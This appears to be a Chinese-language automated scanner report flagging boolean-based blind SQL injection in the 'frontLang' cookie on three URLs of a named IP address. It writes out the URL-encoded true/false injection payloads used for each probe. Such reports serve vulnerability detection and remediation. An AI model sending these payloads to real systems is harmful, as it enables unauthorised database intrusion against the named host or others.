
URL | http://202.201.39.48/index.php/tw/ | ||||
---|---|---|---|---|---|
请求方式 | GET | ||||
问题参数 | frontLang | ||||
判断标准 |
1、根据原始请求,修改cookie值,分别构造伪请求和错误请求,并依次发送伪请求和错误请求; 2、如果原始请求的响应内容和伪请求的响应内容非常相似,且原始请求的响应内容和错误请求的响应内容差异很大,则认为存在该漏洞。 |
||||
判断详情 |
1、构造URL:
http://202.201.39.48/index.php/tw/
,设置参数
frontLang
为
zh-cn%25%27%20Or%201049=1050%20AnD%20%27%25%27=%27%25%27%20--%20
,将构造请求的响应内容和原始请求的响应内容进行相似度对比;
2、构造URL: http://202.201.39.48/index.php/tw/ ,设置参数 frontLang 为 zh-cn%25%27%20Or%201049=1049%20AnD%20%27%25%27=%27%25%27%20--%20 ,将构造请求的响应内容和原始请求的响应内容进行相似度对比。 |
||||
请求&响应 |
|
URL | http://202.201.39.48/index.php/en/.git/index | ||||
---|---|---|---|---|---|
请求方式 | GET | ||||
问题参数 | frontLang | ||||
判断标准 |
1、根据原始请求,修改cookie值,分别构造伪请求和错误请求,并依次发送伪请求和错误请求; 2、如果原始请求的响应内容和伪请求的响应内容非常相似,且原始请求的响应内容和错误请求的响应内容差异很大,则认为存在该漏洞。 |
||||
判断详情 |
1、构造URL:
http://202.201.39.48/index.php/en/.git/index
,设置参数
frontLang
为
zh-cn%27%20AnD%201227=1227%20AnD%20%271227%27=%271227%27%20--%20
,将构造请求的响应内容和原始请求的响应内容进行相似度对比;
2、构造URL: http://202.201.39.48/index.php/en/.git/index ,设置参数 frontLang 为 zh-cn%27%20AnD%201227=1227%20AnD%20%271227%27=%271228%27%20--%20 ,将构造请求的响应内容和原始请求的响应内容进行相似度对比。 |
||||
请求&响应 |
|
URL | http://202.201.39.48/index.php/tw/index.asp | ||||
---|---|---|---|---|---|
请求方式 | GET | ||||
问题参数 | frontLang | ||||
判断标准 |
1、根据原始请求,修改cookie值,分别构造伪请求和错误请求,并依次发送伪请求和错误请求; 2、如果原始请求的响应内容和伪请求的响应内容非常相似,且原始请求的响应内容和错误请求的响应内容差异很大,则认为存在该漏洞。 |
||||
判断详情 |
1、构造URL:
http://202.201.39.48/index.php/tw/index.asp
,设置参数
frontLang
为
zh-cn)%20AnD%201131=1131%20Or%20(1131=1132)%20--%20
,将构造请求的响应内容和原始请求的响应内容进行相似度对比;
2、构造URL: http://202.201.39.48/index.php/tw/index.asp ,设置参数 frontLang 为 zh-cn)%20AnD%201131=1131%20Or%20(1131=1131)%20--%20 ,将构造请求的响应内容和原始请求的响应内容进行相似度对比。 |
||||
请求&响应 |
|